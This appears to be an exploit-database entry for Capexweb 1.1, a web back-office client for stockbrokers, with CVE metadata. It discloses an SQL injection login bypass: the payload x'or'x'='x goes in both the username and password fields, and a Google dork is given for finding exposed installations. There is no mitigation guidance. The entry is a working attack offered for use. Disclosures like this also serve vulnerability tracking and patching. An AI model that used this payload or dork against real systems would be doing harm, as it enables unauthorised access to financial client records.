Capexweb 1.1 - SQL Injection

Author: D1rt3 Dud3
type: webapps
platform: multiple
port: 
date_added: 2011-12-16 
date_updated: 2011-12-16 
verified: 1 
codes: OSVDB-77998;CVE-2011-5031 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Capexweb Sql Vulnerable
# Date: 15 Dec 2011
# Author: D1rt3 Dud3
# Google Dork: inurl:capexweb
# Gr33ts: Th3 RDX
# Version: 1.1
# Description: Capexweb is Web based Backoffice client used by leading Stock Exchanges like Berkeley Gains, angle broking house etc.

http://localhost:8080/capexweb/capexweb/


Log in details:
Username: x'or'x'='x
Password: x'or'x'='x

-------------------------------------------------------------------------------"Indian"